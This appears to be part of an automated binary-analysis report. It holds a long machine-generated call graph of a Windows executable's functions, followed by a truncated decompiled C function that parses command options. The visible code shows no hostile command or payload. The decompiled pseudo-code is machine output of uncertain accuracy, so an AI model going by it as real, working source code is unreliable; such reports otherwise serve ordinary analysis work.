38611->38613 38612->38611 38614 7ff650b69b8d 38613->38614 38646 7ff650b6a8e0 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 38613->38646 38647 7ff650b6a900 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 38614->38647 38621 7ff650b349e5 38618->38621 38619 7ff650b34a83 38619->38573 38619->38581 38620 7ff650b34ac0 14 API calls 38620->38621 38621->38619 38621->38620 38622->38578 38623->38594 38624->38595 38625->38593 38626->38593 38628 7ff650b34ad9 setbuf 38627->38628 38629 7ff650b34b07 FindFirstFileW 38628->38629 38630 7ff650b34b71 FindNextFileW 38628->38630 38632 7ff650b34b19 38629->38632 38638 7ff650b34b5b 38629->38638 38631 7ff650b34b7b GetLastError 38630->38631 38630->38638 38631->38638 38640 7ff650b44664 38632->38640 38635 7ff650b34b4a GetLastError 38635->38638 38636 7ff650b34b2f FindFirstFileW 38636->38635 38636->38638 38637 7ff650b69d10 _handle_error 8 API calls 38639 7ff650b3497b 38637->38639 38638->38637 38639->38605 38639->38606 38643 7ff650b4467a setbuf 38640->38643 38641 7ff650b69d10 _handle_error 8 API calls 38642 7ff650b34b2b 38641->38642 38642->38635 38642->38636 38644 7ff650b44757 GetCurrentDirectoryW 38643->38644 38645 7ff650b446cb 38643->38645 38644->38645 38645->38641 38648->38550 38649->38551 38650->38557 38652 7ff650b49380 38651->38652 38678 7ff650b69b9c 38652->38678 38655 7ff650b69b58 4 API calls 38656 7ff650b493b6 38655->38656 38657 7ff650b69b58 4 API calls 38656->38657 38658 7ff650b493de 38657->38658 38658->38411 38660 7ff650b47322 38659->38660 38689 7ff650b4758c 38660->38689 38693 7ff650b28f58 CryptAcquireContextW 38663->38693 38667 7ff650b29b5e 38703 7ff650b59684 38667->38703 38671 7ff650b29b8f memcpy_s 38672 7ff650b69d10 _handle_error 8 API calls 38671->38672 38673 7ff650b11b46 38672->38673 38673->38363 38675 7ff650b38bdd 38674->38675 38720 7ff650b38c74 38675->38720 38680 7ff650b69b58 38678->38680 38679 7ff650b493a5 38679->38655 38680->38679 38681 7ff650b73598 setbuf 2 API calls 38680->38681 38682 7ff650b69b82 38680->38682 38681->38680 38683 7ff650b69b8d 38682->38683 38687 7ff650b6a8e0 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 38682->38687 38688 7ff650b6a900 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 38683->38688 38690 7ff650b475a9 38689->38690 38691 7ff650b17421 38690->38691 38692 7ff650b69b9c 4 API calls 38690->38692 38691->38414 38691->38416 38692->38691 38694 7ff650b28fb7 38693->38694 38695 7ff650b28f93 CryptGenRandom CryptReleaseContext 38693->38695 38697 7ff650b29bd0 11 API calls 38694->38697 38695->38694 38696 7ff650b28fc2 38695->38696 38698 7ff650b29bd0 38696->38698 38697->38696 38699 7ff650b5b9d8 10 API calls 38698->38699 38700 7ff650b29bf9 38699->38700 38713 7ff650b72fc4 38700->38713 38702 7ff650b29c0b 38702->38667 38702->38702 38704 7ff650b29b7d 38703->38704 38705 7ff650b596b5 memcpy_s 38703->38705 38707 7ff650b59510 38704->38707 38705->38704 38716 7ff650b59714 38705->38716 38708 7ff650b59577 memcpy_s 38707->38708 38711 7ff650b5954e memcpy_s 38707->38711 38709 7ff650b59714 8 API calls 38708->38709 38710 7ff650b595aa 38709->38710 38710->38671 38711->38708 38712 7ff650b59714 8 API calls 38711->38712 38712->38708 38714 7ff650b72fdb QueryPerformanceCounter 38713->38714 38715 7ff650b72fd7 38713->38715 38714->38715 38715->38702 38717 7ff650b59756 38716->38717 38717->38717 38718 7ff650b69d10 _handle_error 8 API calls 38717->38718 38719 7ff650b598e3 38718->38719 38719->38705 38721 7ff650b38c8a memcpy_s 38720->38721 38724 7ff650b5b3ec 38721->38724 38727 7ff650b5b3a0 GetCurrentProcess GetProcessAffinityMask 38724->38727 38728 7ff650b38c34 38727->38728 38728->38416 38730 7ff650b5c283 38729->38730 38731 7ff650b5bd16 38729->38731 38746 7ff650b5c50a 38730->38746 38748 7ff650b5c296 38730->38748 38731->38730 38732 7ff650b5bd1c 38731->38732 38737 7ff650b5bd2b 38732->38737 38738 7ff650b5bfc3 38732->38738 38781 7ff650b5bfe3 38732->38781 38733 7ff650b5c64b 38735 7ff650b5c66c 38733->38735 38736 7ff650b5c739 38733->38736 38734 7ff650b5c3d5 38760 7ff650b5c3f2 38734->38760 38845 7ff650b5c041 38734->38845 38741 7ff650b5c71b 38735->38741 38755 7ff650b5c672 38735->38755 38744 7ff650b5c7d2 38736->38744 38766 7ff650b5c74e 38736->38766 38745 7ff650b5bd34 38737->38745 38811 7ff650b5be90 38737->38811 38742 7ff650b54598 48 API calls 38738->38742 38739 7ff650b5c17b 38784 7ff650b5c216 38739->38784 38793 7ff650b5c19d 38739->38793 38739->38845 38869 7ff650b5be3c 38739->38869 38740 7ff650b5c001 38769 7ff650b5c01f 38740->38769 38803 7ff650b5c0c9 38740->38803 38740->38845 38740->38869 38749 7ff650b54598 48 API calls 38741->38749 38751 7ff650b5bfcd 38742->38751 38743 7ff650b54598 48 API calls 38756 7ff650b5bef7 38743->38756 38747 7ff650b54598 48 API calls 38744->38747 38753 7ff650b5bd73 38745->38753 38757 7ff650b5be02 38745->38757 38835 7ff650b5bd43 38745->38835 38746->38733 38758 7ff650b5c5b3 38746->38758 38759 7ff650b5c531 38746->38759 38752 7ff650b5c7f4 38747->38752 38748->38734 38834 7ff650b5c345 38748->38834 38748->38845 38748->38869 38763 7ff650b5c725 38749->38763 38750 7ff650b5c5cc 38764 7ff650b5c62d 38750->38764 38814 7ff650b5c5d1 38750->38814 38900 7ff650b1657c 38751->38900 38771 7ff650b283f0 54 API calls 38752->38771 38777 7ff650b54598 48 API calls 38753->38777 38796 7ff650b5bdc3 38753->38796 38754 7ff650b5c6eb 38762 7ff650b54598 48 API calls 38754->38762 38755->38754 38772 7ff650b5c685 38755->38772 38773 7ff650b5c6e1 38755->38773 38774 7ff650b283f0 54 API calls 38756->38774 38756->38796 38779 7ff650b5be6a 38757->38779 38791 7ff650b5be0c 38757->38791 38758->38733 38758->38750 38759->38784 38797 7ff650b5c580 38759->38797 38759->38845 38761 7ff650b5c44a 38760->38761 38837 7ff650b5c403 38760->38837 38767 7ff650b54598 48 API calls 38761->38767 38776 7ff650b5c707 38762->38776 38778 7ff650b283f0 54 API calls 38763->38778 38782 7ff650b54598 48 API calls 38764->38782 38765 7ff650b5c7a8 38783 7ff650b54598 48 API calls 38765->38783 38766->38765 38821 7ff650b5c758 38766->38821 38780 7ff650b5c472 38767->38780 38799 7ff650b5c09e 38769->38799 38816 7ff650b5c032 38769->38816 38769->38869 38770 7ff650b5c3ad 38787 7ff650b54598 48 API calls 38770->38787 38771->38845 38772->38784 38785 7ff650b5c6cd 38772->38785 38788 7ff650b54598 48 API calls 38773->38788 38774->38796 38775 7ff650b54598 48 API calls 38786 7ff650b5bd99 38775->38786 38789 7ff650b283f0 54 API calls 38776->38789 38790 7ff650b5bdd9 38777->38790 38778->38756 38810 7ff650b54598 48 API calls 38779->38810 38904 7ff650b28208 38780->38904 38781->38739 38781->38740 38798 7ff650b5c637 38782->38798 38794 7ff650b5c7c1 38783->38794 38784->38845 38784->38869 38910 7ff650b2c924 38785->38910 38817 7ff650b27b00 125 API calls 38786->38817 38801 7ff650b5c3c1 38787->38801 38788->38754 38789->38756 38886 7ff650b27b00 38790->38886 38806 7ff650b5be54 38791->38806 38807 7ff650b5be11 38791->38807 38804 7ff650b5c137 38793->38804 38825 7ff650b5c1a7 38793->38825 38793->38869 38809 7ff650b283f0 54 API calls 38794->38809 38795 7ff650b5bf0d 38813 7ff650b54598 48 API calls 38795->38813 38812 7ff650b69d10 _handle_error 8 API calls 38796->38812 38829 7ff650b54598 48 API calls 38797->38829 38815 7ff650b283f0 54 API calls 38798->38815 38836 7ff650b54598 48 API calls 38799->38836 38800 7ff650b27b00 125 API calls 38800->38770 38818 7ff650b283f0 54 API calls 38801->38818 38803->38804 38819 7ff650b5c0f0 38803->38819 38803->38869 38839 7ff650b54598 48 API calls 38804->38839 38805 7ff650b5c775 38822 7ff650b54598 48 API calls 38805->38822 38824 7ff650b283f0 54 API calls 38806->38824 38807->38753 38841 7ff650b5be1b 38807->38841 38809->38756 38810->38790 38811->38795 38826 7ff650b5beb7 38811->38826 38811->38869 38827 7ff650b1122c 38812->38827 38828 7ff650b5bf2b 38813->38828 38830 7ff650b5c5f8 38814->38830 38814->38845 38815->38796 38832 7ff650b5c07c 38816->38832 38833 7ff650b5c037 38816->38833 38817->38796 38818->38796 38819->38796 38838 7ff650b5c108 38819->38838 38865 7ff650b54598 48 API calls 38819->38865 38821->38756 38821->38796 38821->38805 38840 7ff650b54598 48 API calls 38821->38840 38842 7ff650b5c78e 38822->38842 38823 7ff650b28208 54 API calls 38823->38796 38824->38753 38843 7ff650b5c1ac 38825->38843 38825->38869 38826->38779 38844 7ff650b5bebc 38826->38844 38827->38423 38846 7ff650b27b00 125 API calls 38828->38846 38847 7ff650b5c591 38829->38847 38831 7ff650b54598 48 API calls 38830->38831 38848 7ff650b5c613 38831->38848 38850 7ff650b54598 48 API calls 38832->38850 38849 7ff650b5c03c 38833->38849 38833->38869 38834->38770 38834->38796 38834->38800 38835->38753 38835->38790 38851 7ff650b5bda7 38835->38851 38852 7ff650b5bd69 38835->38852 38853 7ff650b5c0af 38836->38853 38837->38796 38854 7ff650b54598 48 API calls 38837->38854 38837->38869 38855 7ff650b54598 48 API calls 38838->38855 38839->38869 38840->38805 38856 7ff650b5be20 38841->38856 38841->38869 38857 7ff650b283f0 54 API calls 38842->38857 38843->38796 38867 7ff650b54598 48 API calls 38843->38867 38858 7ff650b5bed9 38844->38858 38844->38869 38845->38743 38845->38756 38845->38796 38846->38756 38859 7ff650b283f0 54 API calls 38847->38859 38860 7ff650b283f0 54 API calls 38848->38860 38849->38845 38861 7ff650b5c054 38849->38861 38862 7ff650b5c086 38850->38862 38864 7ff650b54598 48 API calls 38851->38864 38852->38753 38872 7ff650b5bd83 38852->38872 38863 7ff650b283f0 54 API calls 38853->38863 38854->38869 38866 7ff650b5c123 38855->38866 38856->38796 38875 7ff650b54598 48 API calls 38856->38875 38857->38756 38868 7ff650b54598 48 API calls 38858->38868 38859->38796 38860->38796 38870 7ff650b54598 48 API calls 38861->38870 38871 7ff650b27b00 125 API calls 38862->38871 38863->38796 38873 7ff650b5bdb1 38864->38873 38865->38838 38874 7ff650b27b00 125 API calls 38866->38874 38876 7ff650b5c1bf 38867->38876 38877 7ff650b5beed 38868->38877 38869->38775 38869->38796 38878 7ff650b5c05e 38870->38878 38871->38796 38879 7ff650b283f0 54 API calls 38872->38879 38884 7ff650b27b00 125 API calls 38873->38884 38874->38796 38875->38873 38880 7ff650b27b00 125 API calls 38876->38880 38881 7ff650b27b00 125 API calls 38877->38881 38882 7ff650b283f0 54 API calls 38878->38882 38883 7ff650b5bd8f 38879->38883 38880->38756 38881->38756 38882->38796 38885 7ff650b54598 48 API calls 38883->38885 38884->38796 38885->38786 38887 7ff650b27b3a 38886->38887 38916 7ff650b5c860 38887->38916 38889 7ff650b27b43 swprintf 38890 7ff650b71614 swprintf 46 API calls 38889->38890 38891 7ff650b27b90 38890->38891 38892 7ff650b28208 54 API calls 38891->38892 38893 7ff650b27b9f 38892->38893 38920 7ff650b27d20 125 API calls 2 library calls 38893->38920 38895 7ff650b27bc4 38921 7ff650b2cc88 SetLastError 38895->38921 38901 7ff650b165a1 swprintf 38900->38901 38902 7ff650b71614 swprintf 46 API calls 38901->38902 38903 7ff650b165bd 38902->38903 38903->38781 38905 7ff650b28229 38904->38905 38906 7ff650b2825a 38904->38906 38907 7ff650b72cc8 fflush 4 API calls 38905->38907 38906->38823 38908 7ff650b2823b 38907->38908 38909 7ff650b2803c 52 API calls 38908->38909 38909->38906 38911 7ff650b2c8f8 38910->38911 38922 7ff650b112c8 38911->38922 38917 7ff650b5c86d 38916->38917 38918 7ff650b5c88d 38916->38918 38917->38918 38919 7ff650b5c87f MessageBeep 38917->38919 38918->38889 38919->38918 38920->38895 38923 7ff650b5bcd8 125 API calls 38922->38923 38924 7ff650b1132d 38923->38924 38925 7ff650b69d10 _handle_error 8 API calls 38924->38925 38926 7ff650b11339 38925->38926 38927 7ff650b2cc94 38926->38927 38934 7ff650b2c9ec GetLastError 38927->38934 38929 7ff650b2cd38 38930 7ff650b69d10 _handle_error 8 API calls 38929->38930 38931 7ff650b2c913 38930->38931 38931->38796 38932 7ff650b2ccd2 38932->38929 38933 7ff650b111c0 125 API calls 38932->38933 38933->38932 38935 7ff650b2ca06 FormatMessageW 38934->38935 38936 7ff650b2ca32 38934->38936 38935->38936 38936->38932 38938 7ff650b6b187 38937->38938 38939 7ff650b6b1a4 RtlPcToFileHeader 38937->38939 38938->38939 38940 7ff650b6b1bc 38939->38940 38941 7ff650b6b1cb RaiseException 38939->38941 38940->38941 38941->38434 38945 7ff650b4942d 38942->38945 38944 7ff650b49499 38951 7ff650b36514 134 API calls 38944->38951 38950 7ff650b36514 134 API calls 38945->38950 38947 7ff650b494a5 38952 7ff650b36514 134 API calls 38947->38952 38949 7ff650b494b1 38950->38944 38951->38947 38952->38949 38953 7ff650b13cae 38954 7ff650b13ce1 38953->38954 39006 7ff650b321c0 38954->39006 38955 7ff650b13d65 39018 7ff650b32840 38955->39018 38957 7ff650b13e17 39028 7ff650b18104 156 API calls 38957->39028 38958 7ff650b13d0a 38958->38955 38958->38957 38960 7ff650b13d53 38958->38960 39023 7ff650b31fb0 11 API calls 2 library calls 38960->39023 38961 7ff650b13e3c 39029 7ff650b180c4 126 API calls 38961->39029 38963 7ff650b13d8a 38989 7ff650b13de2 38963->38989 39024 7ff650b32864 61 API calls 38963->39024 38965 7ff650b13d5b 38965->38955 38967 7ff650b13e44 38970 7ff650b13e53 38967->38970 39030 7ff650b2ca8c 137 API calls 38967->39030 38969 7ff650b13db8 39025 7ff650b31d58 137 API calls 38969->39025 39031 7ff650b1a91c 185 API calls 38970->39031 38974 7ff650b13dcf 39026 7ff650b31c70 125 API calls 38974->39026 38975 7ff650b13e5b 39032 7ff650b19368 125 API calls 38975->39032 38979 7ff650b13e65 38980 7ff650b13e76 38979->38980 38981 7ff650b2c930 61 API calls 38979->38981 39033 7ff650b18144 125 API calls 38980->39033 38981->38980 38986 7ff650b13e7e 38986->38989 38991 7ff650b2c930 61 API calls 38986->38991 39027 7ff650b5cf34 48 API calls 38989->39027 38991->38989 39007 7ff650b321d6 setbuf 39006->39007 39008 7ff650b3220c CreateFileW 39007->39008 39009 7ff650b32282 GetLastError 39008->39009 39013 7ff650b322e0 39008->39013 39010 7ff650b44664 9 API calls 39009->39010 39011 7ff650b3229d 39010->39011 39012 7ff650b322a1 CreateFileW GetLastError 39011->39012 39011->39013 39012->39013 39014 7ff650b3232e 39013->39014 39015 7ff650b32310 SetFileTime 39013->39015 39016 7ff650b69d10 _handle_error 8 API calls 39014->39016 39015->39014 39017 7ff650b32371 39016->39017 39017->38958 39034 7ff650b3295c 39018->39034 39021 7ff650b3285e 39021->38963 39022 7ff650b2c930 61 API calls 39022->39021 39023->38965 39024->38969 39025->38974 39026->38989 39028->38961 39029->38967 39031->38975 39032->38979 39033->38986 39039 7ff650b31e84 39034->39039 39037 7ff650b32849 39037->39021 39037->39022 39038 7ff650b2c924 125 API calls 39038->39037 39040 7ff650b31e95 setbuf 39039->39040 39041 7ff650b31ef6 CreateFileW 39040->39041 39042 7ff650b31ef0 39040->39042 39041->39042 39043 7ff650b31f6f 39042->39043 39044 7ff650b44664 9 API calls 39042->39044 39047 7ff650b69d10 _handle_error 8 API calls 39043->39047 39045 7ff650b31f3d 39044->39045 39045->39043 39046 7ff650b31f41 CreateFileW 39045->39046 39046->39043 39048 7ff650b31fa2 39047->39048 39048->39037 39048->39038 39049 7ff650b69c20 39050 7ff650b69c58 __GSHandlerCheckCommon 39049->39050 39051 7ff650b69c84 39050->39051 39053 7ff650b6b918 39050->39053 39062 7ff650b6c8f0 39053->39062 39056 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39057 7ff650b6b967 39056->39057 39058 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39057->39058 39059 7ff650b6b970 __GSHandlerCheck_EH 39058->39059 39068 7ff650b6d93c 39059->39068 39086 7ff650b6c90c 39062->39086 39065 7ff650b6b95a 39065->39056 39069 7ff650b6d96b __except_validate_context_record 39068->39069 39070 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39069->39070 39071 7ff650b6d970 39070->39071 39072 7ff650b6d9c0 39071->39072 39077 7ff650b6dada __GSHandlerCheck_EH 39071->39077 39085 7ff650b6b9c1 39071->39085 39073 7ff650b6dac7 39072->39073 39075 7ff650b6da1b __GSHandlerCheck_EH 39072->39075 39072->39085 39100 7ff650b6b388 39073->39100 39078 7ff650b6dbca 39075->39078 39083 7ff650b6da6b 39075->39083 39082 7ff650b6db1f 39077->39082 39077->39085 39187 7ff650b6b8d4 39077->39187 39190 7ff650b7489c 35 API calls abort 39078->39190 39082->39085 39104 7ff650b6cecc 39082->39104 39160 7ff650b6e21c 39083->39160 39085->39051 39087 7ff650b6c92b GetLastError 39086->39087 39088 7ff650b6c8f9 39086->39088 39099 7ff650b6ebcc 6 API calls __vcrt_InitializeCriticalSectionEx 39087->39099 39088->39065 39098 7ff650b7489c 35 API calls abort 39088->39098 39101 7ff650b6b39a 39100->39101 39102 7ff650b6e21c __GSHandlerCheck_EH 143 API calls 39101->39102 39103 7ff650b6b3b5 39102->39103 39103->39085 39105 7ff650b6cf29 __GSHandlerCheck_EH 39104->39105 39106 7ff650b6cf48 39105->39106 39107 7ff650b6cf31 39105->39107 39109 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39106->39109 39108 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39107->39108 39119 7ff650b6cf36 39108->39119 39110 7ff650b6cf4d 39109->39110 39112 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39110->39112 39110->39119 39111 7ff650b6d3c0 39222 7ff650b7489c 35 API calls abort 39111->39222 39114 7ff650b6cf58 39112->39114 39116 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39114->39116 39116->39119 39117 7ff650b6d07c __GSHandlerCheck_EH 39118 7ff650b6d317 39117->39118 39154 7ff650b6d0b8 __GSHandlerCheck_EH 39117->39154 39118->39111 39120 7ff650b6d315 39118->39120 39216 7ff650b6d3c8 46 API calls 6 library calls 39118->39216 39119->39111 39119->39117 39121 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39119->39121 39123 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39120->39123 39122 7ff650b6cfe8 39121->39122 39125 7ff650b6d35f 39122->39125 39128 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39122->39128 39127 7ff650b6d358 39123->39127 39124 7ff650b6d2fc __GSHandlerCheck_EH 39124->39120 39133 7ff650b6d3a8 39124->39133 39129 7ff650b69d10 _handle_error 8 API calls 39125->39129 39127->39111 39127->39125 39130 7ff650b6cff8 39128->39130 39131 7ff650b6d36b 39129->39131 39132 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39130->39132 39131->39085 39134 7ff650b6d001 39132->39134 39136 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39133->39136 39213 7ff650b6b900 44 API calls _CreateFrameInfo 39134->39213 39138 7ff650b6d3ae 39136->39138 39137 7ff650b6d013 39137->39111 39141 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39137->39141 39139 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39138->39139 39140 7ff650b6d3b7 39139->39140 39142 7ff650b7360c __GSHandlerCheck_EH 35 API calls 39140->39142 39143 7ff650b6d03e 39141->39143 39142->39111 39143->39117 39144 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39143->39144 39145 7ff650b6d04a 39144->39145 39146 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39145->39146 39147 7ff650b6d053 39146->39147 39214 7ff650b6e518 44 API calls 4 library calls 39147->39214 39149 7ff650b6b8d4 44 API calls BuildCatchObjectHelperInternal 39149->39154 39150 7ff650b6d063 39150->39117 39152 7ff650b6d067 39150->39152 39215 7ff650b6e608 44 API calls Is_bad_exception_allowed 39152->39215 39154->39124 39154->39149 39191 7ff650b6d7f8 39154->39191 39205 7ff650b6cdf8 39154->39205 39155 7ff650b6d3a2 39217 7ff650b7360c 39155->39217 39158 7ff650b6d06f std::bad_alloc::bad_alloc __GSHandlerCheck_EH 39158->39155 39159 7ff650b6b168 Concurrency::cancel_current_task 2 API calls 39158->39159 39159->39155 39161 7ff650b6b8c0 Is_bad_exception_allowed 44 API calls 39160->39161 39162 7ff650b6e267 __GSHandlerCheck_EH 39161->39162 39163 7ff650b6e288 39162->39163 39164 7ff650b6e29f 39162->39164 39165 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39163->39165 39166 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39164->39166 39167 7ff650b6e28d 39165->39167 39168 7ff650b6e2a4 39166->39168 39169 7ff650b6e50f 39167->39169 39176 7ff650b6e297 39167->39176 39172 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39168->39172 39168->39176 39261 7ff650b7489c 35 API calls abort 39169->39261 39170 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39184 7ff650b6e2c3 __GSHandlerCheck_EH 39170->39184 39174 7ff650b6e2af 39172->39174 39175 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39174->39175 39175->39176 39176->39170 39177 7ff650b6e4d1 39178 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39177->39178 39179 7ff650b6e4d6 39178->39179 39180 7ff650b6e4e1 39179->39180 39181 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39179->39181 39182 7ff650b69d10 _handle_error 8 API calls 39180->39182 39181->39180 39183 7ff650b6e4f4 39182->39183 39183->39085 39184->39177 39255 7ff650b6ed90 39184->39255 39260 7ff650b6b8e8 44 API calls _CreateFrameInfo 39184->39260 39188 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39187->39188 39189 7ff650b6b8dd 39188->39189 39189->39082 39192 7ff650b6d825 39191->39192 39204 7ff650b6d8b5 39191->39204 39223 7ff650b6b8c0 39192->39223 39195 7ff650b6b8c0 Is_bad_exception_allowed 44 API calls 39196 7ff650b6d847 39195->39196 39197 7ff650b6d874 39196->39197 39198 7ff650b6b8c0 Is_bad_exception_allowed 44 API calls 39196->39198 39196->39204 39199 7ff650b6b8d4 BuildCatchObjectHelperInternal 44 API calls 39197->39199 39198->39197 39200 7ff650b6d888 39199->39200 39201 7ff650b6d8a1 39200->39201 39202 7ff650b6b8c0 Is_bad_exception_allowed 44 API calls 39200->39202 39200->39204 39203 7ff650b6b8d4 BuildCatchObjectHelperInternal 44 API calls 39201->39203 39202->39201 39203->39204 39204->39154 39206 7ff650b6ce35 __GSHandlerCheck_EH 39205->39206 39207 7ff650b6ce5b 39206->39207 39229 7ff650b6cd34 44 API calls 2 library calls 39206->39229 39209 7ff650b6b8c0 Is_bad_exception_allowed 44 API calls 39207->39209 39210 7ff650b6ce6d 39209->39210 39226 7ff650b6b54c RtlUnwindEx 39210->39226 39213->39137 39214->39150 39215->39158 39216->39120 39230 7ff650b75660 GetLastError 39217->39230 39219 7ff650b73617 39250 7ff650b7489c 35 API calls abort 39219->39250 39224 7ff650b6c8f0 _CreateFrameInfo 44 API calls 39223->39224 39225 7ff650b6b8c9 39224->39225 39225->39195 39225->39196 39225->39204 39227 7ff650b69d10 _handle_error 8 API calls 39226->39227 39228 7ff650b6b662 39227->39228 39228->39154 39229->39207 39231 7ff650b7567d 39230->39231 39232 7ff650b75682 39230->39232 39251 7ff650b76d24 6 API calls __vcrt_uninitialize_ptd 39231->39251 39233 7ff650b77244 abort 15 API calls 39232->39233 39236 7ff650b756cb 39232->39236 39235 7ff650b75699 39233->39235 39237 7ff650b756a1 39235->39237 39252 7ff650b76d7c 6 API calls __vcrt_uninitialize_ptd 39235->39252 39239 7ff650b756e6 SetLastError 39236->39239 39240 7ff650b756d0 SetLastError 39236->39240 39242 7ff650b7495c __free_lconv_mon 15 API calls 39237->39242 39254 7ff650b7489c 35 API calls abort 39239->39254 39240->39219 39245 7ff650b756a8 39242->39245 39243 7ff650b756b8 39243->39237 39246 7ff650b756bf 39243->39246 39245->39239 39253 7ff650b7540c 15 API calls abort 39246->39253 39248 7ff650b756c4 39249 7ff650b7495c __free_lconv_mon 15 API calls 39248->39249 39249->39236 39251->39232 39252->39243 39253->39248 39256 7ff650b6edb3 __GSHandlerCheck_SEH 39255->39256 39258 7ff650b175d4 134 API calls 39256->39258 39262 7ff650b11604 39256->39262 39257 7ff650b6edba __GSHandlerCheck_SEH 39257->39184 39258->39257 39260->39184 39264 7ff650b1161a 39262->39264 39263 7ff650b1163c 39266 7ff650b49414 134 API calls 39263->39266 39264->39263 39268 7ff650b5d8f0 134 API calls 39264->39268 39267 7ff650b11655 39266->39267 39267->39257 39269 7ff650b726a0 39270 7ff650b7360c __GSHandlerCheck_EH 35 API calls 39269->39270 39271 7ff650b726a5 39270->39271 39276 7ff650b769c8 LeaveCriticalSection 39271->39276 39273 7ff650b726b0 39274 7ff650b726bc 39273->39274 39275 7ff650b726d8 11 API calls 39273->39275 39275->39274

                                                                                                            Executed Functions

                                                                                                            Function 00007FF650B252FC Relevance: 29.4, APIs: 1, Strings: 15, Instructions: 1395COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 85%
                                                                                                            			E00007FF67FF650B252FC(void* __edx, void* __rax, long long __rbx, long long __rcx, void* __rdx, void* __r9) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t362;
				signed int _t364;
				void* _t368;
				void* _t369;
				void* _t377;
				void* _t379;
				signed int _t388;
				void* _t391;
				void* _t395;
				signed int _t396;
				void* _t408;
				void* _t422;
				void* _t424;
				void* _t427;
				void* _t430;
				signed int _t431;
				void* _t441;
				void* _t446;
				void* _t448;
				void* _t449;
				signed int _t455;
				void* _t468;
				void* _t469;
				signed int _t471;
				void* _t472;
				void* _t473;
				signed int _t476;
				signed int _t479;
				void* _t482;
				void* _t486;
				void* _t488;
				void* _t489;
				void* _t496;
				void* _t507;
				signed int _t521;
				signed short _t547;
				signed int _t555;
				intOrPtr _t663;
				void* _t669;
				signed int _t677;
				signed int _t723;
				signed int _t731;
				signed int _t734;
				void* _t737;
				void* _t738;
				void* _t739;
				void* _t740;
				void* _t741;
				signed int _t745;
				signed short _t747;
				void* _t753;
				signed short _t762;
				void* _t763;
				void* _t782;
				void* _t788;
				signed int _t808;
				signed int _t812;
				void* _t817;
				void* _t826;
				void* _t827;
				void* _t828;
				signed int _t835;
				void* _t869;
				void* _t870;
				void* _t871;
				void* _t874;
				signed short _t877;
				void* _t882;
				signed short _t890;
				signed long long _t902;
				signed long long _t903;
				short* _t904;
				signed short* _t908;
				signed long long _t910;
				signed short* _t911;
				signed short* _t912;
				signed long long _t914;
				signed short* _t915;
				signed int* _t918;
				short* _t919;
				signed int* _t920;
				signed int* _t921;
				intOrPtr _t922;
				short* _t941;
				signed long long _t944;
				signed short* _t967;
				signed int* _t972;
				signed long long _t1017;
				signed long long _t1022;
				char* _t1036;
				void* _t1044;
				signed short* _t1050;
				void* _t1061;
				intOrPtr* _t1062;
				short* _t1063;
				void* _t1064;
				signed long long _t1065;
				signed long long _t1068;
				signed long long _t1069;
				signed long long _t1070;
				signed long long _t1071;
				signed long long _t1073;
				signed long long _t1075;
				signed long long _t1077;
				void* _t1079;
				void* _t1081;
				void* _t1084;
				signed long long _t1085;
				void* _t1102;
				void* _t1103;
				void* _t1104;
				void* _t1105;
				signed long long _t1106;
				signed long long _t1111;
				void* _t1116;
				signed int* _t1118;
				signed short* _t1119;
				intOrPtr* _t1120;
				intOrPtr _t1121;
				signed short* _t1123;
				signed short* _t1124;
				void* _t1126;
				signed long long _t1127;
				signed long long _t1131;
				signed long long _t1137;

				 *((long long*)(_t1084 + 0x18)) = __rbx;
				_t362 = E00007FF67FF650B69CB0(0x1870, __rax, _t1103, _t1104);
				_t1085 = _t1084 - __rax;
				_t902 =  *0x50b978f0; // 0x27db226282f1
				_t903 = _t902 ^ _t1085;
				 *(_t1085 + 0x1860) = _t903;
				_t918 = __rcx;
				 *((long long*)(_t1085 + 0x50)) = __rcx;
				E00007FF67FF650B5D5F4();
				_t740 = _t362 - 0x4e;
				if (_t740 > 0) goto 0x50b25e63;
				if (_t740 == 0) goto 0x50b2666d;
				_t741 = _t362 - 0x46;
				if (_t741 > 0) goto 0x50b256ee;
				if (_t741 == 0) goto 0x50b256d2;
				if (_t741 == 0) goto 0x50b256c3;
				if (_t741 == 0) goto 0x50b256a2;
				if (_t741 == 0) goto 0x50b2554a;
				if (_t741 == 0) goto 0x50b254e6;
				if (_t741 == 0) goto 0x50b25452;
				if (_t362 - 0x3a != 1) goto 0x50b26633;
				_t1062 = __rdx + 2;
				E00007FF67FF650B5D5F4();
				if (_t362 == 0x50) goto 0x50b253e5;
				_t5 = _t1079 + 0x29; // 0x2b
				r12d = _t5;
				if ( *_t1062 != r12w) goto 0x50b253d2;
				_t918[1] = _t918[1] | E00007FF67FF650B24310(__rcx, __rdx + 4, _t1077, _t1079, __rcx + 9);
				_t918[2] = dil;
				goto 0x50b26930;
				_t364 = E00007FF67FF650B24310(_t918, _t1062, _t1077, _t1079,  &(_t918[2]));
				 *_t918 =  *_t918 | _t364;
				goto 0x50b26930;
				_t521 =  *(__rdx + 4) & 0x0000ffff;
				_t745 = _t521;
